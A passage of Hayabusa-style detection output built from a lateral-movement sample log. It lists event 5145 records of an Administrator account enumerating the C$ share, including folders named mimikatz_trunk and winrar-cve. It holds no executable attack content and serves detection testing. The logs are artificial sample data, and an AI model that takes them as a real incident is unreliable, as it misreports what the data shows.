Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.857 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.857 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.867 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.867 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.867 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.957 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.957 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.957 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.967 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.977 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 